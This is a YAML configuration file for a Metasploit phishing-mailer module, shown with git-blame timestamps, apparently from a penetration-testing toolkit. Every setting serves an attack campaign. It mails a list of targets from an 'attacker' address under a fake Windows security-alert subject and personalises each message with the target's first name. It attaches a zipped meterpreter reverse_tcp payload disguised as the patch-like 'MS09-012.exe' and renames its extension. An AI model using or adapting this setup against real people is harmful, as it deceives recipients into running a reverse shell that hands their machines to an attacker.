2009-01-19 01:18:41 +00:00
|
|
|
# YAML:1.0
|
|
|
|
# Configuration file for emailer.rb module
|
|
|
|
# Taken from Jabra spl0it.org
|
|
|
|
#
|
|
|
|
# Emails CSV File (Fname Lname,email)
|
2009-07-12 03:57:25 +00:00
|
|
|
to: /tmp/targets.csv
|
2009-01-19 01:18:41 +00:00
|
|
|
# Email is sent from this address
|
|
|
|
from: attacker@metasf.com
|
|
|
|
# Subject
|
2009-07-12 03:57:25 +00:00
|
|
|
subject: "[SECURITY-ALERT] Critical Windows Vulnerability"
|
2009-01-19 01:18:41 +00:00
|
|
|
# Type ( text or text/html )
|
|
|
|
type: text/html
|
|
|
|
# Msg body file
|
2009-07-12 03:57:25 +00:00
|
|
|
msg_file: /tmp/email_body.txt
|
2009-01-19 01:18:41 +00:00
|
|
|
# Number of seconds to wait before next email
|
|
|
|
wait: 5
|
|
|
|
# Prepend the first name to the email body
|
2009-07-12 03:57:25 +00:00
|
|
|
add_name: true
|
2009-01-19 01:18:41 +00:00
|
|
|
# Add custom signature from file
|
2009-07-12 03:57:25 +00:00
|
|
|
sig: true
|
2009-01-19 01:18:41 +00:00
|
|
|
# Signature file
|
2009-07-12 03:57:25 +00:00
|
|
|
sig_file: /tmp/sig.txt
|
|
|
|
|
|
|
|
#### Attachment Information ####
|
2009-01-19 01:18:41 +00:00
|
|
|
# Add an email attachment (File exploit anyone?)
|
2009-07-12 03:57:25 +00:00
|
|
|
attachment: true
|
2009-01-19 01:18:41 +00:00
|
|
|
# Path to file attachment
|
|
|
|
attachment_file: test.jpg
|
|
|
|
# Name of file attachment
|
|
|
|
attachment_file_name: msf.jpg
|
|
|
|
# Type of attachment
|
|
|
|
attachment_file_type: image/jpeg
|
2009-07-12 03:57:25 +00:00
|
|
|
|
|
|
|
#### Metasploit/Payload Creation ####
|
|
|
|
# create a metasploit payload
|
|
|
|
make_payload: true
|
|
|
|
# zip the payload
|
|
|
|
zip_payload: true
|
|
|
|
# metasploit server ip
|
|
|
|
msf_ip: 127.0.0.1
|
|
|
|
# metasploit server port
|
|
|
|
msf_port: 443
|
|
|
|
# metasploit payload
|
|
|
|
msf_payload: windows/meterpreter/reverse_tcp
|
|
|
|
# metasploit payload
|
|
|
|
msf_filename: MS09-012.exe
|
|
|
|
# metasploit location
|
|
|
|
msf_location: /pentest/exploits/framework3
|
|
|
|
# change the extension
|
|
|
|
msf_change_ext: true
|
|
|
|
# new extension
|
|
|
|
msf_payload_ext: vxe
|